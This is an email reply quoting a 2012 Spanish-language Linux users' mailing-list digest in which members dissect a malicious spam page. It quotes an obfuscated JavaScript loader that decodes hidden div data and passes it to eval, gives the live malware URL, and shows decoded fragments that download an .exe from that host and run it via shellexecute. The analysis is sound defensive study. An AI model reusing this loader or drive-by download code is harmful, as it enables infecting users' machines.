
Que pensas del codigo che?<br><br><div class="gmail_quote">El 11 de octubre de 2012 14:08,  <span dir="ltr"><<a href="mailto:uylug-varios-request@listas.uylug.org.uy" target="_blank">uylug-varios-request@listas.uylug.org.uy</a>></span> escribió:<br>


<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">Send Uylug-varios mailing list submissions to<br>

        <a href="mailto:uylug-varios@listas.uylug.org.uy">uylug-varios@listas.uylug.org.uy</a><br>

<br>

To subscribe or unsubscribe via the World Wide Web, visit<br>

        <a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

or, via email, send a message with subject or body 'help' to<br>

        <a href="mailto:uylug-varios-request@listas.uylug.org.uy">uylug-varios-request@listas.uylug.org.uy</a><br>

<br>

You can reach the person managing the list at<br>

        <a href="mailto:uylug-varios-owner@listas.uylug.org.uy">uylug-varios-owner@listas.uylug.org.uy</a><br>

<br>

When replying, please edit your Subject line so it is more specific<br>

than "Re: Contents of Uylug-varios digest..."<br>

<br>

<br>

Today's Topics:<br>

<br>

   1. Re: ataques curiosos (Kenneth Irving)<br>

   2. Re: ataques curiosos (Kenneth Irving)<br>

<br>

<br>

----------------------------------------------------------------------<br>

<br>

Message: 1<br>

Date: Wed, 10 Oct 2012 22:57:32 -0200 (UYST)<br>

From: Kenneth Irving <<a href="mailto:ken@fq.edu.uy">ken@fq.edu.uy</a>><br>

To: <a href="mailto:uylug-varios@uylug.org.uy">uylug-varios@uylug.org.uy</a><br>

Subject: Re: [uylug-varios] ataques curiosos<br>

Message-ID: <<a href="mailto:alpine.DEB.1.10.1210102255010.9995@mail.fq.edu.uy">alpine.DEB.1.10.1210102255010.9995@mail.fq.edu.uy</a>><br>

Content-Type: text/plain; charset="iso-8859-15"; Format="flowed"<br>

<br>

Pedro: s?, gracias. Eso es exactamente lo que quer?a hacer, decodificar el<br>

archivo y volcarlo a alg?n lugar, pero no sab?a c?mo hacerlo con<br>

javascript! Por eso mand? la consulta, me parec?a m?s r?pido que andar<br>

aprendiendo c?mo hacerlo en javascript. ?gracias!<br>

<br>

saludos<br>

<br>

Kenneth<br>

<br>

On Thu, 11 Oct 2012, Pedro Worcel wrote:<br>

<br>

> Hola gente!<br>

><br>

> Aprovecho este post para presentarme, soy Pedro, estoy programando ahora en Nueva Zelanda pero me crie en Mercedes, y estudie en la<br>

> UTU. Me paso mi viejo un link de esta conversacion me parecio interesante y ahora me anote para UYLUG. Tambien me anote un poco porque<br>

> me impresiono que se vaya a organizar un evento a nivel Latinoamericano de la OWASP en Montevideo, muy groso.<br>

><br>

> La verdad que no entiendo como codifica el malware el javascript, pero no hace falta saberlo porque al final el mismo lo decodifica y<br>

> lo manda a un eval.<br>

><br>

> Para poder trabajar con el lo descargue desde la linea de comandos y lo edite con vim. Reemplace todas las ocurrencias de eval por<br>

> console.log y luego copie los contenidos de el firebug en el pastebin y lo hice mas lindo.<br>

><br>

> El codigo del malware esta aca:<br>

><br>

> <a href="http://pastie.org/5032658" target="_blank">http://pastie.org/5032658</a><br>

><br>

> Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)<br>

><br>

> Saludos!<br>

> Pedro<br>

><br>

> ---------- Mensaje reenviado ----------<br>

> De: Kenneth Irving <<a href="mailto:ken@fq.edu.uy">ken@fq.edu.uy</a>><br>

> Fecha: 10 de octubre de 2012 19:25<br>

> Asunto: [uylug-varios] ataques curiosos<br>

> Para: UYLUG <<a href="mailto:uylug-varios@uylug.org.uy">uylug-varios@uylug.org.uy</a>><br>

><br>

><br>

><br>

> Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el ?ltimo era un bolet?n de noticias trucho de CNN), pero que<br>

> termina siempre en algo parecido. Son emails que siempre tienen alg?n link que te baja un HTML que contiene en su interior 3 o 4 links<br>

> que te bajan un c?digo Javascript, que lo ?nico que hace es bajar alg?n otro archivo, este s? un HTML que contiene el c?digo malicioso<br>

> en javascript.<br>

><br>

> Paso el link final para bajar el c?digo malicioso de javascript:<br>

><br>

> ?<a href="http://2.cmisdfoundation.com/links/persons_jobs.php" target="_blank">http://2.cmisdfoundation.com/links/persons_jobs.php</a><br>

><br>

> y trascribo s?lo parte del c?digo. El c?digo comienza con esto:<br>

><br>

> ------------------------- comienzo ---------------------------------<br>

> <html><head><title></title></head><body><div<br>

> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10@321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3<br>


> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c@341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3<br>

> c353e373k!381r311t31^"<br>

> 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31@2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e@18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1<br>


> 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"<br>

> 49="42e3f34@353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m@352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3<br>


> 53e3k1e_37353k253c$353d353e3k(223p293418@341e34393m&2924191r39+361831"<br>

> 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33@3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e@3m353e343f&3i3s3s12<br>


> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"<br>

> ------------------------ [c?digo cortado] ---------------------------<br>

><br>

> El bloque de datos codificados contin?a, y el archivo termina con esto:<br>

> ------------------------ [continuaci?n] -----------------------------<br>

> ?65="53i)23313j3518#191e3i353g*3c31333518<br>

> !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12@171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q<br>

><br>

> 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39@1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script><br>

> if(020==0x10)a=document.getElementsByTagName(dd)[1];<br>

> s="";<br>

> for(i=0;;i++){<br>

> ? ? ? ? if(window.document)r=a.getAttribute(i);<br>

> ? ? ? ? if(r){s=s+r;}else break;<br>

> }<br>

> a=s;<br>

> asd();<br>

> s="";<br>

> for(i=0;i<a.length;i+=2){<br>

> ? ? ? ? s+=String.fromCharCode(parseInt(a.substr(i,2),32));<br>

> }<br>

> c=s;<br>

> e=eval;<br>

> try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}<br>

> ? ? ? ? ? ? ? ? </script></body></html><br>

> -------------------- fin -------------------------------<br>

><br>

> Esto lo paso s?lo como muestra y para no publicar el socotroco completo. Es m?s pr?ctico simplemente bajarlo desde el link original.<br>

><br>

> Es obvio que el bloque de datos codificados e decodificado en el c?digo javascript final, y luego de decodificarlo se ejecuta con el<br>

> "e(c)".<br>

><br>

> Imagino que debe tratarse de c?digo javascript ofuscado para explotar alguna debilidad de alg?n navegador o alg?n cliente de email,<br>

> pero mis pobres conocimientos de javascript no me han permitido decodificar esto sin riesgo, por lo que lo publico en esta lista, tal<br>

> vez alguien con suficiente curiosidad pueda decodificarlo y hacernos saber de qu? se trata. Es simplemente curiosidad, me result? muy<br>

> interesante el trabajo que se toman para ocultar el c?digo malicioso.<br>

><br>

> saludos<br>

><br>

> ?Kenneth<br>

> _______________________________________________<br>

> Uylug-varios mailing list<br>

> <a href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>

> <a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

><br>

><br>

> --<br>

> <a href="http://is.gd/droope" target="_blank">http://is.gd/droope</a><br>

><br>

><br>

-------------- next part --------------<br>

A non-text attachment was scrubbed...<br>

Name: susp.tar.gz<br>

Type: application/x-gzip<br>

Size: 12684 bytes<br>

Desc:<br>

URL: <<a href="http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/9ca37a04/attachment-0001.bin" target="_blank">http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/9ca37a04/attachment-0001.bin</a>><br>


-------------- next part --------------<br>

_______________________________________________<br>

Uylug-varios mailing list<br>

<a href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>

<a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

<br>

------------------------------<br>

<br>

Message: 2<br>

Date: Wed, 10 Oct 2012 23:07:55 -0200 (UYST)<br>

From: Kenneth Irving <<a href="mailto:ken@fq.edu.uy">ken@fq.edu.uy</a>><br>

To: <a href="mailto:uylug-varios@uylug.org.uy">uylug-varios@uylug.org.uy</a><br>

Subject: Re: [uylug-varios] ataques curiosos<br>

Message-ID: <<a href="mailto:alpine.DEB.1.10.1210102305380.9995@mail.fq.edu.uy">alpine.DEB.1.10.1210102305380.9995@mail.fq.edu.uy</a>><br>

Content-Type: text/plain; charset="iso-8859-15"; Format="flowed"<br>

<br>

<br>

?pah! qu? socotroco de c?digo. La mayor parte parece tener que ver con<br>

verificar la presencia de alg?n plugin del navegador. Pero al final baja<br>

algo e intenta ejecutarlo en un shell:<br>

<br>

var ra4 = ".//..//757736c.exe"<br>

[...]<br>

ra2.open("GET",<br>

"<a href="http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz" target="_blank">http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz</a>",<br>


false);<br>

[...]<br>

with(ra1) {<br>

                 shellexecute(ra4);<br>

             }<br>

<br>

?es posible hacer esto desde javascript? ?bajar un ejecutable y ejecutarlo<br>

desde un shell?<br>

<br>

saludos<br>

<br>

Kenneth<br>

<br>

On Thu, 11 Oct 2012, Pedro Worcel wrote:<br>

<br>

> Hola gente!<br>

><br>

> Aprovecho este post para presentarme, soy Pedro, estoy programando ahora en Nueva Zelanda pero me crie en Mercedes, y estudie en la<br>

> UTU. Me paso mi viejo un link de esta conversacion me parecio interesante y ahora me anote para UYLUG. Tambien me anote un poco porque<br>

> me impresiono que se vaya a organizar un evento a nivel Latinoamericano de la OWASP en Montevideo, muy groso.<br>

><br>

> La verdad que no entiendo como codifica el malware el javascript, pero no hace falta saberlo porque al final el mismo lo decodifica y<br>

> lo manda a un eval.<br>

><br>

> Para poder trabajar con el lo descargue desde la linea de comandos y lo edite con vim. Reemplace todas las ocurrencias de eval por<br>

> console.log y luego copie los contenidos de el firebug en el pastebin y lo hice mas lindo.<br>

><br>

> El codigo del malware esta aca:<br>

><br>

> <a href="http://pastie.org/5032658" target="_blank">http://pastie.org/5032658</a><br>

><br>

> Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)<br>

><br>

> Saludos!<br>

> Pedro<br>

><br>

> ---------- Mensaje reenviado ----------<br>

> De: Kenneth Irving <<a href="mailto:ken@fq.edu.uy">ken@fq.edu.uy</a>><br>

> Fecha: 10 de octubre de 2012 19:25<br>

> Asunto: [uylug-varios] ataques curiosos<br>

> Para: UYLUG <<a href="mailto:uylug-varios@uylug.org.uy">uylug-varios@uylug.org.uy</a>><br>

><br>

><br>

><br>

> Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el ?ltimo era un bolet?n de noticias trucho de CNN), pero que<br>

> termina siempre en algo parecido. Son emails que siempre tienen alg?n link que te baja un HTML que contiene en su interior 3 o 4 links<br>

> que te bajan un c?digo Javascript, que lo ?nico que hace es bajar alg?n otro archivo, este s? un HTML que contiene el c?digo malicioso<br>

> en javascript.<br>

><br>

> Paso el link final para bajar el c?digo malicioso de javascript:<br>

><br>

> ?<a href="http://2.cmisdfoundation.com/links/persons_jobs.php" target="_blank">http://2.cmisdfoundation.com/links/persons_jobs.php</a><br>

><br>

> y trascribo s?lo parte del c?digo. El c?digo comienza con esto:<br>

><br>

> ------------------------- comienzo ---------------------------------<br>

> <html><head><title></title></head><body><div<br>

> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10@321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3<br>


> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c@341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3<br>

> c353e373k!381r311t31^"<br>

> 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31@2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e@18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1<br>


> 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"<br>

> 49="42e3f34@353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m@352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3<br>


> 53e3k1e_37353k253c$353d353e3k(223p293418@341e34393m&2924191r39+361831"<br>

> 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33@3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e@3m353e343f&3i3s3s12<br>


> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"<br>

> ------------------------ [c?digo cortado] ---------------------------<br>

><br>

> El bloque de datos codificados contin?a, y el archivo termina con esto:<br>

> ------------------------ [continuaci?n] -----------------------------<br>

> ?65="53i)23313j3518#191e3i353g*3c31333518<br>

> !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12@171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q<br>

><br>

> 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39@1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script><br>

> if(020==0x10)a=document.getElementsByTagName(dd)[1];<br>

> s="";<br>

> for(i=0;;i++){<br>

> ? ? ? ? if(window.document)r=a.getAttribute(i);<br>

> ? ? ? ? if(r){s=s+r;}else break;<br>

> }<br>

> a=s;<br>

> asd();<br>

> s="";<br>

> for(i=0;i<a.length;i+=2){<br>

> ? ? ? ? s+=String.fromCharCode(parseInt(a.substr(i,2),32));<br>

> }<br>

> c=s;<br>

> e=eval;<br>

> try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}<br>

> ? ? ? ? ? ? ? ? </script></body></html><br>

> -------------------- fin -------------------------------<br>

><br>

> Esto lo paso s?lo como muestra y para no publicar el socotroco completo. Es m?s pr?ctico simplemente bajarlo desde el link original.<br>

><br>

> Es obvio que el bloque de datos codificados e decodificado en el c?digo javascript final, y luego de decodificarlo se ejecuta con el<br>

> "e(c)".<br>

><br>

> Imagino que debe tratarse de c?digo javascript ofuscado para explotar alguna debilidad de alg?n navegador o alg?n cliente de email,<br>

> pero mis pobres conocimientos de javascript no me han permitido decodificar esto sin riesgo, por lo que lo publico en esta lista, tal<br>

> vez alguien con suficiente curiosidad pueda decodificarlo y hacernos saber de qu? se trata. Es simplemente curiosidad, me result? muy<br>

> interesante el trabajo que se toman para ocultar el c?digo malicioso.<br>

><br>

> saludos<br>

><br>

> ?Kenneth<br>

> _______________________________________________<br>

> Uylug-varios mailing list<br>

> <a href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>

> <a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

><br>

><br>

> --<br>

> <a href="http://is.gd/droope" target="_blank">http://is.gd/droope</a><br>

><br>

><br>

-------------- next part --------------<br>

A non-text attachment was scrubbed...<br>

Name: susp.tar.gz<br>

Type: application/x-gzip<br>

Size: 12684 bytes<br>

Desc:<br>

URL: <<a href="http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/7cd9bf9b/attachment.bin" target="_blank">http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/7cd9bf9b/attachment.bin</a>><br>


-------------- next part --------------<br>

_______________________________________________<br>

Uylug-varios mailing list<br>

<a href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>

<a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

<br>

------------------------------<br>

<br>

_______________________________________________<br>

Uylug-varios mailing list<br>

<a href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>

<a href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>

<br>

<br>

End of Uylug-varios Digest, Vol 14, Issue 15<br>

********************************************<br>

</blockquote></div><br><br clear="all"><br>-- <br><a href="http://is.gd/signature_" target="_blank">http://is.gd/droope</a><br>